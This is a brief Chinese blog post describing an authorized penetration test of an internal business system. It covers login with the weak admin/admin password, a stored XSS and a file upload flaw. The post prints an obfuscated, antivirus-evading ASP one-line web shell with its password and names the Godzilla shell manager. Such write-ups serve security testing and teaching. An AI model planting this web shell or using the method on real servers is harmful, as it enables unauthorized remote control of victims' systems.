记一次公司项目上的常规渗透测试

admin 2023年10月23日09:20:46评论30 views字数 476阅读1分35秒阅读模式

免责声明:由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

授权项目上的渗透测试,漏洞有网站弱口令—存储型XSS—文件上传

1

前言

本文由知识星球《网络安全情报攻防站》星友堂主投稿,感谢投稿。授权项目下常规的渗透测试。欢迎朋友们积极投稿,投稿有奖励。天冷了来领奶茶钱

记一次公司项目上的常规渗透测试

记一次公司项目上的常规渗透测试

2

正文

网站首页

记一次公司项目上的常规渗透测试

首页啥都没有,找到网站后台

记一次公司项目上的常规渗透测试

弱口令

试试adminadmin

记一次公司项目上的常规渗透测试

由于是内网业务系统一发直接干进去了

XSS漏洞

后台上传文件处

记一次公司项目上的常规渗透测试

记一次公司项目上的常规渗透测试

记一次公司项目上的常规渗透测试

文件上传

免杀木马

<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>连接密码为:c

还是在这里上传

记一次公司项目上的常规渗透测试

记一次公司项目上的常规渗透测试

哥斯拉

记一次公司项目上的常规渗透测试

记一次公司项目上的常规渗透测试

测试完毕,编写报告交差。

3

总结

在进行常规的渗透测试时,看到功能点要进行挨个测试,指不定就有漏洞,细心一点干就完了。

原文始发于微信公众号(李白你好):记一次公司项目上的常规渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月23日09:20:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次公司项目上的常规渗透测试http://cn-sec.com/archives/2135884.html

发表评论

匿名网友 填写信息